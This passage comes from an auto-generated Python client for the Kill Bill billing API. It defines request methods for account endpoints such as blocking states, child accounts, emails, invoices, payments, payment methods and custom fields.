post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_blocking_states(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve blocking states for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_states(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] blocking_state_types:
:param List[Str] blocking_state_svcs:
:param Str audit:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_blocking_states_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_blocking_states_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_blocking_states_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve blocking states for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_states_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] blocking_state_types:
:param List[Str] blocking_state_svcs:
:param Str audit:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'blocking_state_types', 'blocking_state_svcs', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_blocking_states" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_blocking_states`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_blocking_states`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'blocking_state_types' in params:
query_params.append(('blockingStateTypes', params['blocking_state_types'])) # noqa: E501
collection_formats['blockingStateTypes'] = 'multi' # noqa: E501
if 'blocking_state_svcs' in params:
query_params.append(('blockingStateSvcs', params['blocking_state_svcs'])) # noqa: E501
collection_formats['blockingStateSvcs'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/block', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[BlockingState]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_children_accounts(self, account_id=None, **kwargs): # noqa: E501
"""List children accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_children_accounts(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_children_accounts_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_children_accounts_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_children_accounts_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""List children accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_children_accounts_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_children_accounts`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_children_accounts`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/children', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_emails(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account emails # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_emails(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_emails_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_emails_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_emails_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account emails # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_emails_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_emails" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_emails`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_emails`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AccountEmail]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_invoice_payments(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoice payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoice_payments(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool with_attempts:
:param List[Str] plugin_property:
:param Str audit:
:return: List[InvoicePayment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_invoice_payments_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_invoice_payments_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_invoice_payments_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoice payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoice_payments_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool with_attempts:
:param List[Str] plugin_property:
:param Str audit:
:return: List[InvoicePayment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_plugin_info', 'with_attempts', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invoice_payments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_invoice_payments`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_invoice_payments`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'with_attempts' in params:
query_params.append(('withAttempts', params['with_attempts'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoicePayments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[InvoicePayment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_invoices_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoices_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Date start_date:
:param Date end_date:
:param Bool with_migration_invoices:
:param Bool unpaid_invoices_only:
:param Bool include_voided_invoices:
:param Str invoices_filter:
:param Str audit:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_invoices_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_invoices_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_invoices_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoices_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Date start_date:
:param Date end_date:
:param Bool with_migration_invoices:
:param Bool unpaid_invoices_only:
:param Bool include_voided_invoices:
:param Str invoices_filter:
:param Str audit:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'start_date', 'end_date', 'with_migration_invoices', 'unpaid_invoices_only', 'include_voided_invoices', 'invoices_filter', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invoices_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_invoices_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_invoices_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'start_date' in params:
query_params.append(('startDate', params['start_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('endDate', params['end_date'])) # noqa: E501
if 'with_migration_invoices' in params:
query_params.append(('withMigrationInvoices', params['with_migration_invoices'])) # noqa: E501
if 'unpaid_invoices_only' in params:
query_params.append(('unpaidInvoicesOnly', params['unpaid_invoices_only'])) # noqa: E501
if 'include_voided_invoices' in params:
query_params.append(('includeVoidedInvoices', params['include_voided_invoices'])) # noqa: E501
if 'invoices_filter' in params:
query_params.append(('invoicesFilter', params['invoices_filter'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoices', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Invoice]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_overdue_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve overdue state for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_overdue_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: OverdueState
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_overdue_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_overdue_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_overdue_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve overdue state for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_overdue_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: OverdueState
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_overdue_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_overdue_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_overdue_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/overdue', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverdueState', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_payment_methods_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payment_methods_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool included_deleted:
:param List[Str] plugin_property:
:param Str audit:
:return: List[PaymentMethod]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_payment_methods_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_payment_methods_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_payment_methods_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payment_methods_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool included_deleted:
:param List[Str] plugin_property:
:param Str audit:
:return: List[PaymentMethod]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_plugin_info', 'included_deleted', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_payment_methods_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_payment_methods_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_payment_methods_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[PaymentMethod]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_payments_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payments_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_attempts:
:param Bool with_plugin_info:
:param List[Str] plugin_property:
:param Str audit:
:return: List[Payment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_payments_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_payments_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_payments_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_payments_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_attempts:
:param Bool with_plugin_info:
:param List[Str] plugin_property:
:param Str audit:
:return: List[Payment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_attempts', 'with_plugin_info', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_payments_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_payments_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_payments_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_attempts' in params:
query_params.append(('withAttempts', params['with_attempts'])) # noqa: E501
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/payments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Payment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_account_custom_fields(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Modify custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.modify_account_custom_fields(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.modify_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.modify_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def modify_account_custom_fields_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Modify custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.modify_account_custom_fields_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `modify_account_custom_fields`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `modify_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `modify_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `modify_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def pay_all_invoices(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment for all unpaid invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.pay_all_invoices(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param Bool external_payment:
:param Float payment_amount:
:param Date target_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.pay_all_invoices_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.pay_all_invoices_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def pay_all_invoices_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment for all unpaid invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.pay_all_invoices_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param Bool external_payment:
:param Float payment_amount:
:param Date target_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'payment_method_id', 'external_payment', 'payment_amount', 'target_date', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
